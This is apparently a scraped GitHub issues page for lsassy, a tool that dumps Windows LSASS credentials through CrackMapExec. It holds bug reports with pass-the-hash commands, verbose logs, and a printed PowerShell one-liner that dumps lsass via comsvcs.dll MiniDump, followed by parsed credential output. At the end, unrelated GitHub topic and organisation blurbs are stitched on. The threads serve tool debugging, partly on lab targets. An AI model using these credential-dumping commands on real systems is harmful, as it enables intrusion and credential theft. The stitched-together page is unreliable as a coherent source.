ValueError: IPAddress() does not support netmasks or subnet prefixes! See documentation for details.
Hello Hackndo,
Thanks for this amazing tool, i've tried to combine lsassy to cme using this command "cme smb 192.168.2.0/24 -u Administrateur -p P@ssword@2019 -M lsassy -o PROCDUMP_PATH='/tmp/' PROCDUMP_EXE_NAME='procdump64.exe' " , unfortunately i get some error you will find it below
Do you have some suggestions
Describe the bug
Lsassy's cme module throw a STATUS_LOGON_FAILURE with right credentials.
$ sudo cme --verbose smb 10.10.10.161 -d htb.local -u Administrator -H 4212345nope42not42here0012345678 -M lsassy
DEBUG Passed args:
{'clear_obfscripts': False,
'content': False,
'continue_on_success': False,
'cred_id': [],
'darrell': False,
'depth': None,
'disks': False,
'domain': 'htb.local',
'exclude_dirs': '',
'exec_method': None,
'execute': None,
'fail_limit': None,
'force_ps32': False,
'gen_relay_list': None,
'gfail_limit': None,
'groups': None,
'hash': ['4212345nope42not42here0012345678'],
'jitter': None,
'list_modules': False,
'local_auth': False,
'local_groups': None,
'loggedon_users': False,
'lsa': False,
'module': 'lsassy',
'module_options': [],
'no_output': False,
'ntds': None,
'obfs': False,
'only_files': False,
'pass_pol': False,
'password': [],
'pattern': None,
'port': 445,
'protocol': 'smb',
'ps_execute': None,
'regex': None,
'rid_brute': None,
'sam': False,
'server': 'https',
'server_host': '0.0.0.0',
'server_port': None,
'sessions': False,
'share': 'C$',
'shares': False,
'show_module_options': False,
'spider': None,
'spider_folder': '.',
'target': ['10.10.10.161'],
'threads': 100,
'timeout': None,
'ufail_limit': None,
'username': ['Administrator'],
'users': None,
'verbose': True,
'wmi': None,
'wmi_namespace': 'root\\cimv2'}
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
DEBUG add_credential(credtype=hash, domain=HTB, username=Administrator, password=4212345nope42not42here0012345678, groupid=None, pillaged_from=None) => None
SMB 10.10.10.161 445 FOREST [+] htb.local\Administrator 4212345nope42not42here0012345678 (Pwn3d!)
LSASSY 10.10.10.161 445 FOREST [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'htb.local' -u 'Administrator' -p 'None' -H ':4212345nope42not42here0012345678' 10.10.10.161 -vv
DEBUG ----- lsassy output -----
DEBUG [*] [10.10.10.161] Authenticating against 10.10.10.161
DEBUG [*] [10.10.10.161] Provided credentials : htb.local\Administrator:None
DEBUG [*] [10.10.10.161] Closing Impacket connection
DEBUG [*] [10.10.10.161] Cleaning complete
DEBUG [*] [10.10.10.161] Error : SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
DEBUG
DEBUG ----- end output -----
LSASSY 10.10.10.161 445 FOREST [-] Error while executing lsassy, try using CrackMapExec with --verbose to get more details
DEBUG ----- lsassy error [14] -----
DEBUG [X] [10.10.10.161] Authentication error
DEBUG
DEBUG ----- end error -----
Expected behavior
Using lsassy's directly with the right parameters correctly dumps the credentials:
$ lsassy --format json -d 'htb.local' -u 'Administrator' -H ':4212345nope42not42here0012345678' 10.10.10.161 -vv
[*] [10.10.10.161] Authenticating against 10.10.10.161
[*] [10.10.10.161] AuthenticatedDEBUG Lsassy command : lsassy --format json -d 'htb.local' -u 'Administrator' -p 'None' -H ':4212345nope42not42here0012345678' 10.10.10.161 -vv
[*] [10.10.10.161] Trying "dll" method
[*] [10.10.10.161] Commands :
[*] [10.10.10.161] powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\nT9mFwAA.dmp full;Wait-Process -Id (Get-Process rundll32).id"
[*] [10.10.10.161] Trying exec method : "wmi"
[*] [10.10.10.161] Trying to authenticate using : htb.local\Administrator:None
[*] [10.10.10.161] Exec method "wmi" success !
[*] [10.10.10.161] Opening file /Windows/Temp/nT9mFwAA.dmp
[*] [10.10.10.161] File /Windows/Temp/nT9mFwAA.dmp opened
[*] [10.10.10.161] Process lsass.exe has been dumped
[*] [10.10.10.161] Closing Impacket file "/Windows/Temp/nT9mFwAA.dmp"
[*] [10.10.10.161] Process lsass.exe has been parsed
{"htb.local": {"svc-alfresco": [{"password": null, "lmhash": null, "nthash": "4212345nope42nor42here0012345678"}, {"password": "YouWillNotGetItHere", "lmhash": null, "nthash": null}]}}[*] [10.10.10.161] Closing Impacket file "/Windows/Temp/nT9mFwAA.dmp"
[*] [10.10.10.161] File \Windows\Temp\nT9mFwAA.dmp deleted
[*] [10.10.10.161] Closing Impacket connection
[*] [10.10.10.161] Cleaning complete
Additional context
The problem comes from the fact that the parameter -p 'None'
is passed to lsassy from cme, which thinks it's the password to use:
DEBUG Lsassy command : lsassy --format json -d 'htb.local' -u 'Administrator'
-p 'None'
-H ':4212345nope42not42here0012345678' 10.10.10.161 -vv
Merci for the really great tool that you have developed and your detailed articles.
I have some network issues between my attack VM and the victim server. I've seen that the dmp has been successfuly created. I was able to get it through other means. Do I have the possibilities to use lsassy to extract credential from the offline dump, like we can do with mimikatz ?
Thank you.
I can't find a good way to automatically generate builds when I release a new version.
If someone knows how to do this, help would be really appreciated 🤗
➜ ~ pipenv run crackmapexec --verbose smb /root/Desktop/Pentest/targets.txt -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' -d CEH -M lsassy -o METHOD=1 BLOODHOUND=true NEO4JPASS=toor
DEBUG Passed args:
{'clear_obfscripts': False,
'content': False,
'continue_on_success': False,
'cred_id': [],
'darrell': False,
'depth': None,
'disks': False,
'domain': 'CEH',
'exclude_dirs': '',
'exec_method': None,
'execute': None,
'fail_limit': None,
'force_ps32': False,
'gen_relay_list': None,
'gfail_limit': None,
'groups': None,
'hash': ['aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd'],
'jitter': None,
'list_modules': False,
'local_auth': False,
'local_groups': None,
'loggedon_users': False,
'lsa': False,
'module': 'lsassy',
'module_options': ['METHOD=1', 'BLOODHOUND=true', 'NEO4JPASS=toor'],
'no_output': False,
'ntds': None,
'obfs': False,
'only_files': False,
'pass_pol': False,
'password': [],
'pattern': None,
'port': 445,
'protocol': 'smb',
'ps_execute': None,
'regex': None,
'rid_brute': None,
'sam': False,
'server': 'https',
'server_host': '0.0.0.0',
'server_port': None,
'sessions': False,
'share': 'C$',
'shares': False,
'show_module_options': False,
'spider': None,
'spider_folder': '.',
'target': ['/root/Desktop/Pentest/targets.txt'],
'threads': 100,
'timeout': None,
'ufail_limit': None,
'username': ['Administrator'],
'users': None,
'verbose': True,
'wmi': None,
'wmi_namespace': 'root\\cimv2'}
SMB 192.168.1.200 445 WIN12-SERVER [*] Windows Server 2012 R2 Datacenter 9600 x64 (name:WIN12-SERVER) (domain:CEH) (signing:True) (SMBv1:True)
SMB 192.168.1.250 445 PC [*] Windows 7 Professional 7600 x64 (name:PC) (domain:CEH) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB 192.168.1.200 445 WIN12-SERVER [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000] C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000] C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E306] C: <SECURE> 127.0.0.1
DEBUG [#E306] C: <MAGIC> 0x6060B017
DEBUG [#E306] C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E306] S: <HANDSHAKE> 0x00000003
DEBUG [#E306] C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E306] S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-5'}
DEBUG [#E306] C: BEGIN {}
DEBUG [#E306] C: RUN 'MATCH (c:Computer {name:"WIN12-SERVER.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E306] C: PULL_ALL
DEBUG [#E306] S: SUCCESS {}
DEBUG [#E306] S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E306] S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E306] C: COMMIT
DEBUG [#E306] S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY 192.168.1.200 445 WIN12-SERVER [-] Node WIN12-SERVER.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E306] C: GOODBYE
DEBUG [#E306] C: <CLOSE>
LSASSY 192.168.1.200 445 WIN12-SERVER [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.200 -vv --method 1
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB 192.168.1.250 445 PC [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000] C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000] C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E30A] C: <SECURE> 127.0.0.1
DEBUG [#E30A] C: <MAGIC> 0x6060B017
DEBUG [#E30A] C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E30A] S: <HANDSHAKE> 0x00000003
DEBUG [#E30A] C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E30A] S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-6'}
DEBUG [#E30A] C: BEGIN {}
DEBUG [#E30A] C: RUN 'MATCH (c:Computer {name:"PC.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E30A] C: PULL_ALL
DEBUG [#E30A] S: SUCCESS {}
DEBUG [#E30A] S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E30A] S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E30A] C: COMMIT
DEBUG [#E30A] S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY 192.168.1.250 445 PC [-] Node PC.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E30A] C: GOODBYE
DEBUG [#E30A] C: <CLOSE>
LSASSY 192.168.1.250 445 PC [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.250 -vv --method 1
DEBUG ----- lsassy output -----
Traceback (most recent call last):
File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
connection.__init__(self, args, db, host)
File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
self.proto_flow()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
self.call_modules()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
self.module.on_admin_login(context, self)
File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:07Z <Greenlet at 0x7f2a2c5c5dd0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.200')> failed with TypeError
DEBUG ----- lsassy output -----
Traceback (most recent call last):
File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
connection.__init__(self, args, db, host)
File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
self.proto_flow()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
self.call_modules()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
self.module.on_admin_login(context, self)
File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:12Z <Greenlet at 0x7f2a2d2505f0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.250')> failed with TypeError
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.